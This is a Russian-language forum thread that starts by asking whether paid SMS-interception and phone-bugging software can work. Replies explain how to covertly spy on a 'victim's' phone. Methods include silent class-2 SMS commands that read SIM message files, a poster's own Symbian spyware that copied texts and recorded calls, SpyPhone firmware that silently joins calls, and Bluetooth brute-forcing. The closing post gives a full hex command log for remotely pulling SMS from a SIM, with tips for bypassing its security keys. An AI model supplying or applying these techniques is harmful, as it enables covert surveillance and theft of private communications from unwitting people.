Привет всем! Народ! Нужны ваши мнения. На одном из сайтов я нашел софтину, при помощи которой, якобы, можно перехватывать смс-сообщения и проводить прослушку, позвонив на "прослушиваемый" телефон (вызова абонент не заметит, а его телефон будет работать в качестве "жучка"). Меня смутило то, что софтина эта ставится не на телефон жертвы, а на свой. Возможно ли, хотя бы, теоритически получить такой сервис? Или это полный развод? Цена софтинки около 500 руб. Пиши ваши мнения.... Заранее всем благодарен!
Послав жертве особым образом сформированный SMS, можно получить те SMS, которые хранятся в памяти SIM-карты. Если же SMS хранятся в памяти телефона (обычно бывает именно так), то их не выудить удалённо. Разве что через SyncML, но по-мойму большинство трубок поддерживают этот стандарт только для синхронизации контактов, но не для хранимых SMS, т.е. удалённо из трубки можно выуживать контакты, но не сообщения. Зато из SIM-карты можно выуживать и то и другое Но только если у карты установлен минимальный уровень безопасности (иначе понадобятся ключи, которых, естественно, у Вас не будет). И ещё, если мне не изменяет память, только 3G-карты позволяют удалённо читать содержимое файлов, т.е. 2G официально не поддерживают такой фишки на уровне протокола. ЗЫ. Жертва действительно не заметит вызов.
Огромное спасибо за инфу. А что за "особым образом сформированный смс"? Тем софтом заявлено, что не происходит удаленное считывание SMS. При отправки сообщений, они просто передаются параллельно и на мобильник "злоумышленника". Я понимаю, что это возможно, если, например, на трубке жертвы живет что-нибудь вроде трояна. Об этом уже много писали в журнале "Хакер". Но все дело в том, что софт именно устанавливается на мобильник "злоумышленника". Возможно ли такое? Вот этот факт меня сильно и смущает.
Это такой SMS, который вместо обычного текста несёт команды для телефона и/или SIM-карты (нечто вроде AT команд). Класс такого SMS устанавливается в 2 или 3 (см. стандарт GSM 03.38), чтобы вместо отображения на дисплее тело этого "сообщения" тихо передавалось соответствующему интерпретатору. Последние SMS сообщения в SIM-карте хранятся в файле 3F00\7F10\6F3C, который обычно доступен для чтения через PDU-команды, которые собственно и помещаются в тело сообщения класса 2. За один раз можно прочитать только 1 сообщение из файла. Интерпретатор считывает заданное сообщение и посылает телефону проактивную команду, чтобы тот запросил данные из SIM-карты и отправил их через SMS на заданный номер. Хмм... Для этого достаточно узнать IMSI жертвы и снифать "эфир" для перехвата его сообщений. Т.к. обычные, т.е. текстовые, SMS не шифруются, перехватывать их не преставляет технической сложности. Тем не менее, я не представляю себе как это может осуществить обычная Java-midlet, ведь у неё нет доступа к "железу" GSM-телефона, да и как ей узнать IMSI жертвы? Или она как-то подменяет IMSI телефона злоумышленника, но тогда HLR быстро заметит, что у него 2 абонента с одинаковым IMSI и забанит обоих. Может быть, у вашего оператора работает сервис форварда SMS и данная мидлет удалённо включает форвард на свой номер, а после перехвата SMS выключает форвард и пересылает его обратно жертве. Других вариантов пока не вижу.
Не читал предыдущих постов, но скажу что я делал программу для таких дел, она просто при отсылке СМС отсылала копию на тот номер телефона который указывался в программе, а также звонки, если телефон был довольно хороший(по памяти) то делал запись разговора если звонили определенные номера. потом надо было попасть в радиус действия блютуса и забрать информацию. делал это все под Symbion, мобильники nokia, к сожаленью java такого не может предоставить. Симбион - многозадачная ОС Джава - ДОС
Мои 5 копеек Насчет прослушивания - есть SpyPhone, под некоторые Сименсы и Нокии. Но там сделано в виде модифицированной прошивки. Действует в двух словах так: 1. при появлении нового звонка (безотносительно из или в целевой телефон) посылается смс на номер, сохраненный в опр. ячейке сим-карты 2. получив во время установленного звонка новый звонок от телефона, номер которого сохранен в опр ячейке сим-карты, телефон устанавливает трехстороннюю конференцию (естественно, молча) - и происходит прослушивание (единственный минус данной схемы в том, что отправка смс - платная, и можно обратить внимание на чередующиеся отправки смс на неизвестный владельцу телефона номер, т.к. входящие звонки как правило бесплатны и утечки денег не вызовут). Относительно описываемой схемы - я думаю, может мидлет шлет особым образом сформированное сообщение на телефон цели, инициируя тем самым скачивание зверя на телефон цели (формат смс для этого в принципе известен, но не знаю - мидлет может к AT командам обращаться напрямую в PDU режиме и вообще может ли?). Если может, то вполне доступно таким образом залить зверя на телефон цели (при этом ему не надо ничего подтверждать или куда либо переходить самому)
Но опять же - она ставится на телефон "жертвы". Тот софт ставится на телефон "злоумышленника". Меня вот этот факт и смущает. Возможно ли такое?
То что программу нужно поставить на телефон жертвы это понятно. А ты являешься слоумышлеником тебе такая программа не нужна, т.е ставить не надо её. Я нынче не знаком с новым(усовершенствованным) протоколом зинезуба, но знаю что на старых версиях можно взломать(банальным подбором, все это делаеться на с++), но для этого надо писать свою программу, ибо подобного не встречал ещё (если кто знает напишите) ЗЫ недовно попался в руки телефон сансунг Д800, так вот не знаю каким макаром он работает, но то что он делает я удивился, по блютусу можно закинуть с него любое приложение, при том что получатель даже не увидит этого(не запросит подтверждение на прием или пароль спросить, т.к телефон новый и не находиться в белом списке), проверял на сансунгах, сименсах, нокиа.
t00x Как оказалось, 2G тоже поддерживают т.н. card audit, т.е. читать sms можно практически с любой карточки. Единственный узкий момент: иногда карточки реагируют только на сообщения приходящие с определённых коротких кодов, принадлежащих оператору. Т.е. если послать sms с обычной трубки, карточка просто проигнорирует аудиторскую команду. Данное ограничение действует редко ибо оно затрудняет самому оператору вводить новые короткие коды для новых сервисов.
Привожу полный лог операции по удалённому выуживанию SMS из карточки некоего мелкого производителя G&D, которую мне позавчера подкинули для тестов: 1. Сначала посылаем аудиторскую команду внутри пакета SMS-PP Envelope. Code (Text): >>> ME -> CARD >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> A0 C2 00 00 6D D1 6B 02 02 83 81 06 03 21 43 F5 0B 60 C4 03 81 63 F0 7F F6 07 12 16 11 17 38 A0 51 02 70 00 00 4C 15 12 21 XX XX B0 00 10 YY YY YY YY YY 00 ZZ ZZ ZZ ZZ ZZ ZZ ZZ A0 A4 00 00 02 3F 00 A0 A4 00 00 02 7F 10 A0 A4 00 00 02 6F 3A A0 DC 01 04 1C 56 6C 61 64 69 6D 69 72 FF FF FF FF FF FF 03 A1 21 F3 FF FF FF FF FF FF FF FF FF FF Разбираем: Code (Text): ENVELOPE: SMS-PP Download DEVICE:NETWORK -> SIM ADDR:345 <-- это мой короткий код TON:National NPI:ISDN SMS DELIVER: 02 70 00 00 4C 15 12 21 XX XX B0 00 10 YY YY YY YY YY 00 ZZ ZZ ZZ ZZ ZZ ZZ ZZ ZZ A0 A4 00 00 02 3F 00 A0 A4 00 00 02 7F 10 A0 A4 00 00 02 6F 3A A0 DC 01 04 1C 56 6C 61 64 69 6D 69 72 FF FF FF FF FF FF 03 A1 21 F3 FF FF FF FF FF FF FF FF FF FF user data lg:81 format:8 BITS class:2 more msg:false status report:false user hd:true reply path:true addr:360 TON:UNKNOWN TON NPI:ISDN protocol:SIM Data Download time zone:100 time stamp:16:12:7at11:17:38 XX XX - это ключи Kic и Kid. Обычно можно установить SPI (это предыдущие 2 байта 12 21) в 00 00 и не использовать ключи вообще. YY YY YY YY YY - это значение счётчика. Обычно, если Вам не известно реальное значение счётчика можно просто подставить заведомо большое значение (00 00 01 00 00 прокатывает практически всегда). Если SPI установлен в 00 00, то счётчик вообще не нужен, но тогда не факт, что карточке такой уровень безопасности понравится. ZZ ZZ ZZ ... - это криптографический чексум (3DES). Он не нужен если SPI его не требует. 2. Карточка говорит телефону, что мол команда получена и требует выполнить запрос (т.к. сама карточка sms отправить не может) Code (Text): <<< CARD -> ME <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< 91 2B OK + PROACTIVE 3. Трубка запрашивает команду: Code (Text): >>> ME -> CARD >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> A0 12 00 00 2B FETCH 4. Карточка отдаёт запрос, в котором фактически отсылается ответный sms. Code (Text): <<< CARD -> ME <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< D0 29 81 03 01 13 00 82 02 81 83 06 03 21 43 F5 8B 19 41 00 03 81 63 F0 00 F6 10 02 71 00 00 0B 0A B0 00 10 00 00 00 00 ХХ ХХ ХХ ХХ ХХ ХХ ХХ ХХ ХХ ХХ ХХ SEND SHORT MESSAGE CMD:SEND SHORT MESSAGE Qualifier =00 DEVICE:SIM -> NETWORK ADDR:345 TON:National NPI:ISDN SMS SUBMIT: 02 71 00 00 0B 0A B0 00 10 00 00 00 00 ХХ ХХ ХХ ... user data lg:16 format:8 BITS class:2 status report:false user hd:true reply path:false address:360 TON:UNKNOWN TON NPI:UNKNOWN NPI protocol:SME to SME protocol ref msg:0 reject duplicate msg:false validity:Unlimited XX XX XX ... - это содержимое SMS. 5. Трубка отправляет SMS на заданный в самом начале короткий код и подтверждает: Code (Text): >>> ME -> CARD >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> A0 14 00 00 0C 81 03 01 13 00 02 02 82 81 03 01 00 TERMINAL RESPONSE 6. Последнее слово всегда за карточкой Code (Text): <<< CARD -> ME <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< 90 00 OK Вот и всё. Конечно, чтобы всё это осмыслить, желательно почитать стандарты.